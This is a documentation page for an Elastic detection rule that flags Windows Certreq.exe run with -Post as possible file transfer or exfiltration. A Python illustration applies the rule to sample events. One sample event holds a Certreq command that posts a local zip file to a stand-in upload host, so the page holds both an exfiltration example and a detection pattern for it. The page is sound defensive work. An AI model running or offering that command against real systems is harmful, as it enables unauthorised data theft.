Potential File Transfer via Certreq

Elastic Detection Rules

Summary
This detection rule identifies misuse of the `Certreq` tool in Windows, which is normally used for managing certificates. Adversaries can abuse `Certreq` to upload or download files by making HTTP POST requests, potentially leading to unauthorized data transfers. The rule triggers on process executions where `Certreq.exe` is started with the `-Post` argument. It uses EQL queries over a diverse set of logs, including Winlogbeat and various endpoint security logs, to detect this behavior. The risk score is set at 47, indicating a medium severity level, so this behavior should be monitored closely. A comprehensive investigation guide is provided to assist analysts in assessing the event, including steps to evaluate the context and legitimacy of the activity, its ties to user accounts, and the reputation of any associated domains or IP addresses. It also includes actionable response measures to mitigate any identified threats and prevent further exploitation.
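As an added illustration (not the Elastic rule's own query or code), the following Python mirrors the rule's condition over constructed sample process-start events and pulls out the fields the investigation guide asks an analyst to check (user account, destination host). The ECS-style field names, the list form of `process.args`, and the sample command lines are assumptions.

```python
from urllib.parse import urlparse

# Constructed sample process events (not real telemetry). Field names follow
# ECS conventions as an assumption; the command lines are made up for the demo.
SAMPLE_EVENTS = [
    {"event.type": "start", "host.os.type": "windows", "process.name": "certreq.exe",
     "process.args": ["certreq.exe", "-Post", "-config",
                      "https://files.example.invalid/upload", "C:\\Users\\Public\\data.zip"],
     "user.name": "jdoe"},
    {"event.type": "start", "host.os.type": "windows", "process.name": "CertReq.exe",
     "process.args": ["CertReq.exe", "-new", "request.inf", "request.req"],
     "user.name": "svc-pki"},  # legitimate certificate request, must not alert
    {"event.type": "end", "host.os.type": "windows", "process.name": "certreq.exe",
     "process.args": ["certreq.exe", "-Post", "https://example.invalid/"],
     "user.name": "jdoe"},  # not a start event, must not alert
]


def matches_rule(event):
    """Mirror the rule's condition: a Windows process-start event for Certreq.exe
    whose arguments include -Post. Matching is case-insensitive because Windows
    does not distinguish case in either the image name or the switch."""
    if event.get("host.os.type") != "windows" or event.get("event.type") != "start":
        return False
    if event.get("process.name", "").lower() != "certreq.exe":
        return False
    return any(arg.lower() == "-post" for arg in event.get("process.args", []))


def extract_destination(args):
    """Return the host of the first http(s) URL in the arguments, so the analyst
    can check its reputation as the investigation guide suggests; None if absent."""
    for arg in args:
        parsed = urlparse(arg)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            return parsed.netloc
    return None


def triage(events):
    """Produce one alert per matching event with the triage fields the guide asks about."""
    alerts = []
    for ev in events:
        if matches_rule(ev):
            args = ev.get("process.args", [])
            alerts.append({"user": ev.get("user.name"),
                           "destination_host": extract_destination(args),
                           "command_line": " ".join(args)})
    return alerts
```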
Categories
  • Endpoint
  • Windows
Data Sources
  • Windows Registry
  • Process
  • Firewall
  • Application Log
  • Network Traffic
ATT&CK Techniques
  • T1105
  • T1218
  • T1567
Created: 2023-01-13